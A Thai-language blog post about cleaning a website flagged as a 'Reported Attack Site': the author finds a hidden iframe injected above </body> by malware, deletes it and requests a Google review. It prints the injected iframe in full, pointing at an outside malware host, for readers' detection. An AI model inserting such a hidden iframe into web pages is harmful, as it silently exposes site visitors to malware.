สืบเนื่องมาจากเพื่อนของผม ไวรัสลงเครื่องที่ใช้ทำเวบ แล้วเพื่อนผมคนนี้ก็ทำเวบด้วย html ด้วยซิ ทีนี้เครื่องก็เอ๋อ และอืดไป เจ้าตัวก็คิดว่าคงไม่มีผลอะไรกับเวบ ผมเองก็คิดเช่นนั้นครับ หลังจากนั้น 2 วันให้หลัง ที่หน้าเวบก็ขึ้นว่า Reported Attack Site งานเข้าแล้วซิ ขึ้นแดงเต็มหน้า firefox แบบนี้แล้วใครจะเข้าเวบละ (IE เข้าได้ตามปกติ)
ลองมาแปลดูตามที่บอก สั้นๆ “บอกว่าเวบ xxx เป็นเวบที่ลงโปรแกรมที่จะขโมยข้อมูลของคุณไป หรือไม่ก็ทำลายระบบของคุณ”
ทีนี้ลอง search google ดู ให้ผลดังนี้
ซวยแล้วซิ ผมรีบ ftp เข้าไปดูว่ามีไฟล์ไรแปลกๆ ใน public_html ไหม ก็ไม่เจออะไร ลอง view code ดู search หาว่ามี script อะไรแฝงมาหรือเปล่า
- Search “script” ไม่เจอความผิดปกติ
- ลองหาข้อมูลใหม่ search คำว่า “iframe” แล้วก็เจอจริงๆด้วย ไอ้นี่แหล่ะผู้ร้าย malware เราก็จัดการลบมันไปให้สิ้นซาก
ลบมันทิ้งไป <iframe src=”http://ZieF.pl/rc/” width=1 height=1 style=”border:0″></iframe>
จากนั้นเราก็ไล่ลบไปที่ละไฟล์ที่สงสัยว่าจะเจอ script malware นี้แทรกเข้ามา ตำแหน่งของ script นี้จะอยู่เหนือ </body> ใครที่เจอแบบนี้ก็ลองหาดูครับ
พอลบเสร็จ ใช่ว่างานจะเสร็จเพราะ google ยังไม่ update สถานะล่าสุดให้ เราต้องไปบอก google ว่าให้ไปเช็คหน่อยว่าเวบเราไม่มี malware แล้วนะ
- เข้าไปที่ http://www.google.com/webmasters/tools/ สมัครลงทะเบียนเวบซะ
- google จะให้สร้างไฟล์ html ชื่อแปลกๆยาวๆสมมุติว่าชื่อ google645654fgdsdf.html ละกัน เพื่อยืนยันว่าคุณเป็นเจ้าของเวบตัวจริง จากนั้น ftp เอาไปใส่ใน yourdomain.com/google645654fgdsdf.html
- เข้าไปดูรายละเอียดที่ google บอกมาว่า page ไหนของเรามีปัญหา (อาจจะบอกไม่ครบทุกหน้านะ) ถ้าแน่ใจว่าได้แก้ปัญหาหมดแล้วก็ คลิกบอกให้ google เอาเราออกจาก Reported Attack Site! ก็ใส่เหตุผลประกอบไปซักหน่อยว่าเราแก้ปัญหาอะไรไป
- จากนั้นก็รอๆๆเวลา ถ้าไม่มีอะไรผิดพลาดก็ประมาณ 24-48 ชั่วโมงจะกลับมาเป็นปกติ
